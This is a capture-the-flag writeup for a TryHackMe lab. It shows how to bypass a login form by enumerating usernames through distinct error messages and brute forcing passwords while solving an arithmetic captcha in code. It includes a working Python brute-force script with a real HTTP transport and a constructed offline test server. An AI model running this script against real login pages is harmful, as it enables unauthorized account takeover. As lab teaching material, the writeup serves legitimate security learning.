TryHackMe — Capture! Writeup

“Can you bypass the login form?”

Capture! is an interesting room. It is marked as easy, but don't let that fool you.

For this room, I recommend:-

  • A solid knowledge of HTTP requests and methods
  • Familiarity with Python/any scripting language
  • Familiarity with either Burp Suite or OWASP ZAP

Login form in original state

Once the machine is booted up, we're presented with the login form that we're supposed to bypass using the two provided files, “usernames.txt” and “passwords.txt”.

For now, let’s attempt some logins and look at what happens.

Incorrect username error

Alright, now we know that the site tells us whether a user exists or not (a classic username enumeration weakness: the error message differs for unknown and known users). We can use this later.

Let’s try some more usernames.

Login form with arithmetic captcha

After a couple of failed login attempts, the website attempts to rate limit us using an arithmetic captcha. This means we can't simply replay requests from Burp Suite or OWASP ZAP to brute force the form, since every request would need a fresh captcha answer.

So let’s fill in the captcha and take a look at what’s happening behind the scenes.

POST Request to the login form

The POST request looks pretty simple: we provide a username, a password and the captcha solution.

After attempting more logins, I noticed that there is no pattern to the captcha at all, and there's no way around the rate limitation... for now.

Finding the username & evading the captcha

The way around the rate limitation is to use Python to send the POST requests ourselves and to solve the captcha programmatically. To check which username(s) exist, we simply look for any response that doesn't contain “Error: The user <user> does not exist”.

Here’s a logic flow of what we’ll do:-

  • Define the endpoint for the POST request, and regular expressions to match the captcha equation and the “user does not exist” error.
  • Send incorrect credentials to the site to trigger the rate limiting, so that we are handed a captcha before the loop starts.
  • Use the usernames file to send a POST request for each username.
  • Get the captcha equation using RegEx and solve it. eval() is the quick option, but it evaluates text the server chose, so looking the operator up in a small table and doing the arithmetic yourself is the safer way.
  • Resend the username with the captcha solution.

If the RegEx for the invalid-username error does not match, we print the entire response; otherwise, we move on to the next username in the file, repeating each step.

Response from supplying the correct username

As you can see, when we attempt to log in with an existing username, we see something different in the response.

Now the error says “Invalid password for user <user>”.

Finding the password

So, now that we have the username, we repeat the same process, swapping in the “passwords.txt” file and modifying our POST request to send the known username with each candidate password.

Using the new error we got from the response, we modify our RegEx to match “Invalid password for user <user>” and start fuzzing the password.
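Below is an added example that implements both phases described above (the username enumeration and the password fuzzing) in one script. It is not the author's own script, which the writeup does not reproduce. Everything beyond what the writeup shows is an assumption: the endpoint http://MACHINE_IP/login, the form field names username, password and captcha, the “<a> <op> <b> = ?” layout of the captcha text, and the FakeLoginServer class, which is a constructed stand-in for the room so the script runs offline. Swap `server.post` for `http_post(LOGIN_URL)` and the two lists for the real files to run it against the machine.

```python
import operator
import random
import re
import urllib.parse
import urllib.request

# Endpoint and form field names are assumptions: the page shows a POST with a
# username, a password and a captcha answer, but not the exact names.
LOGIN_URL = "http://MACHINE_IP/login"

# Server messages quoted in the writeup, plus an assumed "<a> <op> <b> = ?" captcha layout.
NO_USER_RE = re.compile(r"Error: The user \S+ does not exist")
BAD_PASS_RE = re.compile(r"Invalid password for user \S+")
CAPTCHA_RE = re.compile(r"(\d+)\s*([+\-*])\s*(\d+)\s*=")
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}


def solve_captcha(body):
    """Return the answer to the arithmetic captcha in a response body, or None if absent.
    The operator is looked up in OPS rather than handing server-controlled text to eval()."""
    m = CAPTCHA_RE.search(body)
    if not m:
        return None
    a, op, b = m.groups()
    return OPS[op](int(a), int(b))


def run_list(post, candidates, build, reject_re):
    """Try each candidate until one draws a response that does NOT match reject_re.
    post(data) -> body is the transport; build(candidate) -> dict builds the form."""
    # Priming request with deliberately bad input: if the rate limit is already on,
    # the reply carries the captcha that the first real attempt must answer.
    answer = solve_captcha(post(build("__prime__")))
    for cand in candidates:
        data = build(cand)
        if answer is not None:
            data["captcha"] = str(answer)
        body = post(data)
        answer = solve_captcha(body)  # each reply holds the captcha for the next request
        if reject_re.search(body):
            continue
        return cand, body
    return None, None


def http_post(url):
    """Transport for a real target (standard library only; unused in the offline demo)."""
    def post(data):
        req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode())
        with urllib.request.urlopen(req) as resp:
            return resp.read().decode()
    return post


class FakeLoginServer:
    """Constructed stand-in for the room's endpoint so the script runs offline.
    It mirrors only what the writeup describes: distinct errors for an unknown user and a
    wrong password, and an arithmetic captcha once a few attempts have failed. Rejecting a
    missing or stale captcha answer is an assumption about the real application."""

    def __init__(self, user, password, flag, threshold=3, seed=7):
        self.user, self.password, self.flag = user, password, flag
        self.threshold, self.failures = threshold, 0
        self.rng = random.Random(seed)
        self.expected = None  # answer required on the next request once rate limited

    def _page(self, message):
        if self.failures >= self.threshold:
            a, b = self.rng.randint(10, 999), self.rng.randint(10, 999)
            op = self.rng.choice("+-*")
            self.expected = OPS[op](a, b)
            message += f"<p>Please solve this: {a} {op} {b} = ?</p>"
        return message

    def post(self, data):
        if self.expected is not None and data.get("captcha") != str(self.expected):
            return self._page("Error: Invalid captcha")
        if data.get("username") != self.user:
            self.failures += 1
            return self._page(f"Error: The user {data.get('username')} does not exist")
        if data.get("password") != self.password:
            self.failures += 1
            return self._page(f"Invalid password for user {self.user}")
        return self._page(f"Welcome! Flag: {self.flag}")


def demo():
    """Username phase, then password phase, against constructed lists and a constructed server."""
    server = FakeLoginServer("natalie", "sunshine1", "THM{constructed-flag}")
    usernames = ["admin", "bob", "natalie", "alice"]            # stands in for usernames.txt
    passwords = ["password", "letmein", "sunshine1", "qwerty"]  # stands in for passwords.txt
    user, _ = run_list(server.post, usernames,
                       lambda u: {"username": u, "password": "x"}, NO_USER_RE)
    pw, body = run_list(server.post, passwords,
                        lambda p: {"username": user, "password": p}, BAD_PASS_RE)
    return user, pw, body


if __name__ == "__main__":
    print(demo())
```

The one design point worth noting: the captcha shown in each reply is the one the next request must answer, so the loop keeps the last solved answer and attaches it to the following POST instead of making two requests per candidate.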

Final flag

And that’s it! We have the flag from the response. If you solved this room in a different way, let me know!

Disclaimer

The purpose of this writeup is solely for educational and informational purposes.

The use of any tools or techniques mentioned in this writeup, including the brute force script, should only be performed on systems that you have explicit permission to test and should never be used to cause harm or engage in any malicious activities.

I am not responsible for any damages or illegal activities resulting from the misuse of the information provided.
